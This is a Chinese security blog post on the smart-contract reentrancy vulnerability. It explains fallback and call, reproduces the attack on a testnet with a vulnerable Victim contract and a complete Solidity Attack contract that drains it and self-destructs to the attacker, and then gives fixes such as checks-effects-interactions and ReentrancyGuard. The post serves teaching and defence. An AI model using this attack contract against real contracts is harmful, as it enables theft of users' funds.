<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.1/css/all.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css">

<script class="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"zpano.cn","root":"/","images":"/images","scheme":"Pisces","version":"8.0.2","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":true,"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":5,"unescape":false,"preload":false}};
  </script>

  <meta name="description" content="一次把智能合约重入漏洞讲透">
<meta property="og:type" content="article">
<meta property="og:title" content="深入智能合约重入漏洞">
<meta property="og:url" content="https://zpano.cn/2021/07/22/22/index.html">
<meta property="og:site_name" content="Zpano&#39;s Blog">
<meta property="og:description" content="一次把智能合约重入漏洞讲透">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://zpano.cn/2021/07/22/22/image-20210722133001108.png">
<meta property="og:image" content="https://zpano.cn/2021/07/22/22/截屏2021-07-22%2015.05.46.png">
<meta property="og:image" content="https://zpano.cn/2021/07/22/22/截屏2021-07-22%2015.09.39.png">
<meta property="og:image" content="https://zpano.cn/2021/07/22/22/image-20210722151041460.png">
<meta property="og:image" content="https://zpano.cn/2021/07/22/22/image-20210722151254363.png">
<meta property="article:published_time" content="2021-07-22T08:41:06.000Z">
<meta property="article:modified_time" content="2021-09-08T08:43:20.000Z">
<meta property="article:author" content="Zpano">
<meta property="article:tag" content="区块链安全">
<meta property="article:tag" content="智能合约安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://zpano.cn/2021/07/22/22/image-20210722133001108.png">


<link rel="canonical" href="https://zpano.cn/2021/07/22/22/">


<script class="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>深入智能合约重入漏洞 | Zpano's Blog</title>
  






  <noscript>
  <style>
  body { margin-top: 2rem; }

  .use-motion .menu-item,
  .use-motion .sidebar,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header {
    visibility: visible;
  }

  .use-motion .header,
  .use-motion .site-brand-container .toggle,
  .use-motion .footer { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle,
  .use-motion .custom-logo-image {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line {
    transform: scaleX(1);
  }

  .search-pop-overlay, .sidebar-nav { display: none; }
  .sidebar-panel { display: block; }
  </style>
</noscript>

<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">
<!-- hexo injector head_end end --></head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">Zpano's Blog</h1>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">不负韶华，不负野心</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-links">

    <a href="/links" rel="section"><i class="fa fa-link fa-fw"></i>友链</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</div>
        
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <section class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#0x01-%E5%89%8D%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">0x01 前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x02-%E9%A2%84%E5%A4%87%E7%9F%A5%E8%AF%86"><span class="nav-number">2.</span> <span class="nav-text">0x02 预备知识</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x03-%E7%AE%80%E5%8D%95%E5%88%86%E6%9E%90"><span class="nav-number">3.</span> <span class="nav-text">0x03 简单分析</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x04-%E5%A4%8D%E7%8E%B0"><span class="nav-number">4.</span> <span class="nav-text">0x04 复现</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%A4%8D%E7%8E%B0%E6%B5%81%E7%A8%8B"><span class="nav-number">4.1.</span> <span class="nav-text">复现流程</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x05-%E4%BF%AE%E5%A4%8D%E5%BB%BA%E8%AE%AE"><span class="nav-number">5.</span> <span class="nav-text">0x05 修复建议</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x06-%E6%80%BB%E7%BB%93"><span class="nav-number">6.</span> <span class="nav-text">0x06 总结</span></a></li></ol></div>
        </section>
        <!--/noindex-->

        <section class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Zpano"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">Zpano</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">35</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">16</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="cc-license site-overview-item animated" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/zh-CN" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>



        </section>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">
      

      

  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://zpano.cn/2021/07/22/22/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="Zpano">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Zpano's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          深入智能合约重入漏洞
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2021-07-22 16:41:06" itemprop="dateCreated datePublished" datetime="2021-07-22T16:41:06+08:00">2021-07-22</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">更新于</span>
        <time title="修改时间：2021-09-08 16:43:20" itemprop="dateModified" datetime="2021-09-08T16:43:20+08:00">2021-09-08</time>
      </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E5%8C%BA%E5%9D%97%E9%93%BE%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">区块链安全</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
      </div>
      <div class="post-meta">
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>5.3k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>5 分钟</span>
    </span>
</div>

            <div class="post-description">一次把智能合约重入漏洞讲透</div>
        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h1 id="0x01-前言"><a href="#0x01-前言" class="headerlink" title="0x01 前言"></a>0x01 前言</h1><p>智能合约的重入漏洞是一个非常经典的漏洞，其产生了非常严重的后果，诸如以太坊分叉等。本文将深入分析其产生的原因和预防机制。</p>
<h1 id="0x02-预备知识"><a href="#0x02-预备知识" class="headerlink" title="0x02 预备知识"></a>0x02 预备知识</h1><ol>
<li><p>合约地址与外部地址的异同</p>
<p><strong>外部账户 EOA</strong></p>
<ul>
<li>由私钥控制</li>
<li>拥有 ether 余额</li>
<li>可以直接发送交易</li>
<li>不包含相关执行代码</li>
<li>可以与合约进行交互，使其执行其上存储的代码</li>
</ul>
<p><strong>合约账户</strong></p>
<ul>
<li>无法使用私钥控制</li>
<li>拥有 ether 余额</li>
<li>通过代码发送交易</li>
<li>含有执行代码</li>
<li>当被外部调用时，可以执行相应代码</li>
<li>拥有自己的独立存储状态，且可以调用其他合约</li>
</ul>
</li>
<li><p><code>fallback</code>函数</p>
<p>也被称为回调函数，在官方文档中时这么描述的</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">A contract can have exactly one unnamed <span class="keyword">function</span>. This <span class="keyword">function</span> cannot have arguments <span class="keyword">and</span> cannot <span class="keyword">return</span> anything. It <span class="keyword">is</span> executed <span class="keyword">on</span> a <span class="keyword">call</span> <span class="keyword">to</span> the contract <span class="keyword">if</span> <span class="keyword">none</span> <span class="keyword">of</span> the other <span class="keyword">functions</span> match the given <span class="keyword">function</span> identifier (<span class="keyword">or</span> <span class="keyword">if</span> <span class="keyword">no</span> data was supplied at <span class="keyword">all</span>).</span><br></pre></td></tr></table></figure>
<p>默认的<code>fallback</code>函数在合约实例中表现形式即为当且仅当只有一个不带参数没有返回值的匿名函数，可以被<strong>重写</strong>。</p>
<p>fallback函数被调用的时机：</p>
<ul>
<li>当外部账户或其他合约向该合约地址发送 ether 时；</li>
<li>当外部账户或其他合约调用了该合约一个<strong>不存在</strong>的函数时；</li>
</ul>
</li>
<li><p>call函数</p>
</li>
</ol>
<p>对于一个合约来说，我们要实现对其的使用，也就是外部调用，就需要使用到call函数。这种情况下call 有两种使用方式</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;address&gt;.call(bytes) <span class="comment">//Call消息传递</span></span><br><span class="line">&lt;address&gt;.call(函数选择器, arg1, arg2, …) <span class="comment">//Call函数调用</span></span><br></pre></td></tr></table></figure>
<p>call函数的返回值为true或者false。当且仅当消息传递或函数调用成功时发挥true，其余情况如消息传递失败，函数调用失败，gas费率超出区块上限等时，返回false。</p>
<p>call的另外一种很重要的作用就是转账，其使用方式为</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;address&gt;.call.value(account).gas(limit_gas)()</span><br></pre></td></tr></table></figure>
<p>并且call函数是transfer与send的底层函数</p>
<h1 id="0x03-简单分析"><a href="#0x03-简单分析" class="headerlink" title="0x03 简单分析"></a>0x03 简单分析</h1><p>来看一段代码</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">withdraw</span>(<span class="params">uint _amount</span>) <span class="title">public</span> </span>&#123;</span><br><span class="line">  <span class="keyword">if</span> (amount &lt;= balances[msg.sender]) &#123;</span><br><span class="line">    msg.sender.call.value(_amount)();</span><br><span class="line">    balances[msg.sender] -= _amount;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>该函数的功能是实现提款操作。用户输入提现的金额，函数对用户的余额进行判断，如果大于等于提现的金额，就使用call函数进行转账，在对用户余额进行相应的扣除。认真读下来似乎没有什么问题，但是在call函数的使用上存在明显的错误。下面将进行分析</p>
<p>如果msg.sender是一个外部地址的话，是正常的转账操作，不会出现什么问题。<br>但是如果msg.sender是一个合约地址的话，call未指定调用的函数，就会默认调用<br>调用fallback函数。此时用到fallback函数的另一个性质，可以被重写。</p>
<p>此时我们的withdraw函数的执行停止在  msg.sender.call.value(_amount)();这一行，也就是说我们在合约的上面的余额还没有被扣除，我们依旧能够绕过                if (amount &lt;= balances[msg.sender])的判断进行转账操作，我们可以这么写</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">contract Attack &#123;</span><br><span class="line">    <span class="function"><span class="keyword">function</span>(<span class="params"></span>) <span class="title">payable</span></span>&#123;</span><br><span class="line">        victim.withDraw(mag.value);</span><br><span class="line">    &#125; </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>第一次我们使用withdraw函数时，受害合约会使用call给我们的合约转账，由于没有指定调用函数，会默认调用我们写的fallback函数中，我们在fallback函数中再次调用受害合约的withdraw函数，从而再次给我们转账，又会再一次触发我们的写fallback函数，如此往复陷入一个循环。</p>
<p>此循环的结束条件：</p>
<ul>
<li>合约的余额不足以给我们的合约转账的时候</li>
<li>本次调用的gas费率达到上限—Gas Limit</li>
</ul>
<p>那么对于存在这种问题的合约如何攻击呢？</p>
<h1 id="0x04-复现"><a href="#0x04-复现" class="headerlink" title="0x04 复现"></a>0x04 复现</h1><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^<span class="number">0.4</span><span class="number">.10</span>;</span><br><span class="line"></span><br><span class="line">contract  Victim &#123;</span><br><span class="line">    address owner;</span><br><span class="line">    mapping (<span class="function"><span class="params">address</span> =&gt;</span> uint256) balances;  </span><br><span class="line"></span><br><span class="line">    event withdrawLog(address, uint256);</span><br><span class="line">    </span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">Victim</span>(<span class="params"></span>) </span>&#123; owner = msg.sender; &#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">deposit</span>(<span class="params"></span>) <span class="title">payable</span> </span>&#123; </span><br><span class="line">      balances[msg.sender] += msg.value; </span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">withdraw</span>(<span class="params">uint256 amount</span>) </span>&#123;</span><br><span class="line">        <span class="built_in">require</span>(balances[msg.sender] &gt;= amount);</span><br><span class="line">        withdrawLog(msg.sender, amount);  </span><br><span class="line">        msg.sender.call.value(amount)();  </span><br><span class="line">        balances[msg.sender] -= amount;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">balanceOf</span>(<span class="params"></span>) <span class="title">returns</span> (<span class="params">uint256</span>) </span>&#123; </span><br><span class="line">      <span class="keyword">return</span> balances[msg.sender]; &#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">balanceOf</span>(<span class="params">address addr</span>) <span class="title">returns</span> (<span class="params">uint256</span>) </span>&#123; </span><br><span class="line">      <span class="keyword">return</span> balances[addr]; &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>让我们把受害合约的功能简单完善一下</p>
<ul>
<li>owner 记录合约所有者</li>
<li>balances 记录参与者的参与资金情况</li>
<li>withdrawLog 记录每一次转账</li>
<li>victim() 构造函数，对合约进行初始化，设定合约所有者</li>
<li>deposit() 用于接受参与者的资金，并更新记录</li>
<li>withdraw() 用于提款</li>
<li>balanceOf() 查询本合约的余额</li>
<li>balanceOf(address addr) 查询指定地址的余额</li>
</ul>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">contract Attack &#123;</span><br><span class="line">    address owner;</span><br><span class="line">    address victim;</span><br><span class="line">    modifier ownerOnly &#123; <span class="built_in">require</span>(owner == msg.sender); _; &#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">Attack</span>(<span class="params"></span>) <span class="title">payable</span> </span>&#123; owner = msg.sender; &#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">setVictim_adress</span>(<span class="params">address target</span>) <span class="title">ownerOnly</span> </span>&#123; </span><br><span class="line">    		victim = target;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">sendmoney</span>(<span class="params"></span>) <span class="title">ownerOnly</span> <span class="title">payable</span> </span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">this</span>.balance &gt;= <span class="number">1</span> ether) &#123;</span><br><span class="line">            victim.call.value(<span class="number">1</span> ether)(bytes4(keccak256(<span class="string">&quot;deposit()&quot;</span>)));</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">withdraw</span>(<span class="params"></span>) <span class="title">ownerOnly</span> </span>&#123;</span><br><span class="line">        </span><br><span class="line">        victim.call(bytes4(keccak256(<span class="string">&quot;withdraw(uint256)&quot;</span>)), <span class="number">1</span> ether);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">startAttack</span>(<span class="params"></span>) <span class="title">ownerOnly</span> </span>&#123;</span><br><span class="line">        sendmoney();</span><br><span class="line">        withdraw();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">stopAttack</span>(<span class="params"></span>) <span class="title">ownerOnly</span> </span>&#123;</span><br><span class="line">        selfdestruct(owner);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> (<span class="params"></span>) <span class="title">payable</span> </span>&#123;</span><br><span class="line">        victim.call(bytes4(keccak256(<span class="string">&quot;withdraw(uint256)&quot;</span>)), <span class="number">1</span> ether);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>完善我们的攻击合约：</p>
<ul>
<li>owner 记录合约所有者</li>
<li>victim 记录受害合约地址</li>
<li>ownerOnly 设置仅供合约中调用的关键词</li>
<li>Attack() 构造函数，对合约进行初始化，设定合约所有者</li>
<li>setVictim()  设定受害合约地址</li>
<li>sendmoney() 调用victim的deposit()进行转账</li>
<li>withdraw() 调用victim的withdraw()进行转账</li>
<li>startAttack() 集合sendmoney()与withdraw()</li>
<li>stopAttack()  使用自毁函数将攻击合约的资金转移到owner账户</li>
<li>()  重写fallback函数</li>
</ul>
<h2 id="复现流程"><a href="#复现流程" class="headerlink" title="复现流程"></a>复现流程</h2><p>使用<a target="_blank" rel="noopener" href="https://remix.ethereum.org/">remix</a>部署受害合约之后，使用账户一打入5eth，可以从以太坊浏览器上面<a target="_blank" rel="noopener" href="https://rinkeby.etherscan.io/address/0x7005f99d4a6aFF6c8A6f3aB36d78BF4cF2Adb106#internaltx">查询</a>到</p>
<p><img src="/2021/07/22/22/image-20210722133001108.png" alt="image-20210722133001108"></p>
<p>此时我们切换到我们的账户二，部署攻击合约，同时调用setVictim实例化一下</p>
<p><img src="/2021/07/22/22/截屏2021-07-22 15.05.46.png" alt="截屏2021-07-22 15.05.46"></p>
<p>此时便可以调用startAttack进行攻击，在调用的时候需要多一些gas，避免失败</p>
<p>攻击成功后，可以查询到所有攻击流程</p>
<p><img src="/2021/07/22/22/截屏2021-07-22 15.09.39.png" alt="截屏2021-07-22 15.09.39"></p>
<p><img src="/2021/07/22/22/image-20210722151041460.png" alt="image-20210722151041460"></p>
<p>最后调用stopattack转钱跑路</p>
<p><img src="/2021/07/22/22/image-20210722151254363.png" alt="image-20210722151254363"></p>
<p>复现的时候注意把握合约的余额与调用一次withdraw提现余额之间的关系，建议在1-5倍之间，避免发生out of gas 从而导致攻击失败</p>
<h1 id="0x05-修复建议"><a href="#0x05-修复建议" class="headerlink" title="0x05 修复建议"></a>0x05 修复建议</h1><ol>
<li>指定gas费率，一次转账仅需消耗21000gas，可以这么做</li>
</ol>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">msg.sender.call.value(amount).gas(<span class="number">23000</span>)();</span><br><span class="line"><span class="comment">//因为可能存在其他的计算，如果只制定21000，会有较高的机率发生失败，因此需要预留一部分gas</span></span><br></pre></td></tr></table></figure>
<ol>
<li>使用其他转账函数</li>
</ol>
<ul>
<li><p><strong>send</strong>    address.send(uint256 amount) returns (bool)</p>
</li>
<li><p>向address发送amount数量的Wei（注意单位），如果执行失败返回false。发送的同时传输2300gas，gas数量不可调整</p>
</li>
<li><p><strong>transfer</strong>   address.transfer(uint256 amount)</p>
</li>
<li><p>向address发送amount数量的Wei（注意单位），如果执行失败则throw。发送的同时传输2300gas，gas数量不可调整</p>
</li>
</ul>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="selector-tag">msg</span><span class="selector-class">.sender</span><span class="selector-class">.send</span>(<span class="selector-tag">amount</span>);</span><br><span class="line"><span class="selector-tag">mag</span><span class="selector-class">.sender</span><span class="selector-class">.transfer</span>(<span class="selector-tag">amount</span>);</span><br></pre></td></tr></table></figure>
<ol>
<li>采用checks-effects-interactions模式</li>
</ol>
<p>把对余额的操作放在转账之前</p>
<figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">balances[msg.sender] -= amount<span class="comment">;</span></span><br><span class="line">msg.sender.call.value(amount)()<span class="comment">;  </span></span><br></pre></td></tr></table></figure>
<p>这样，每次攻击者想要提现都必须先执行余额变动操作，就无法实现重入了</p>
<ol>
<li>使用互斥锁</li>
</ol>
<p>该攻击的关键在于合约的withdraw函数无法完整的执行，停停留在call层面，如果我们能让其的执行变成一个整体，就像mysql的事务一样，就可以有效防止重入。</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">require</span>(!locked, <span class="string">&quot;Reentrant call detected!&quot;</span>);</span><br><span class="line">  locked = <span class="literal">true</span>;</span><br><span class="line">  ...</span><br><span class="line">  locked = <span class="literal">false</span>;</span><br></pre></td></tr></table></figure>
<p>把我们需要执行的代码插入其中，就能保证每次执行是一次完整的。</p>
<ol>
<li>使用OpenZeppelin官方的<a target="_blank" rel="noopener" href="https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/security/ReentrancyGuard.sol">ReentrancyGuard合约</a></li>
</ol>
<p>OpenZeppelin官方在ReentrancyGuard合约中定义了nonReentrant函数修饰词，可以在关键函数中使用，防止重入</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">modifier <span class="function"><span class="title">nonReentrant</span>(<span class="params"></span>)</span> &#123;</span><br><span class="line">        <span class="comment">// On the first call to nonReentrant, _notEntered will be true</span></span><br><span class="line">        <span class="built_in">require</span>(_status != _ENTERED, <span class="string">&quot;ReentrancyGuard: reentrant call&quot;</span>);</span><br><span class="line">        <span class="comment">// Any calls to nonReentrant after this point will fail</span></span><br><span class="line">        _status = _ENTERED;</span><br><span class="line">        _;</span><br><span class="line">        <span class="comment">// By storing the original value once again, a refund is triggered (see</span></span><br><span class="line">        <span class="comment">// https://eips.ethereum.org/EIPS/eip-2200)</span></span><br><span class="line">        _status = _NOT_ENTERED;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p>与互斥锁的思想差不多，但是其官方将其封装成函数修饰词使用</p>
<ol>
<li>采用pull payment模式<a target="_blank" rel="noopener" href="https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/security/PullPayment.sol">PullPayment合约</a></li>
</ol>
<p>其核心的思想是不直接将资金发送给接受者，而是每一笔交易去新建一个合约，由接受者自己去提取。</p>
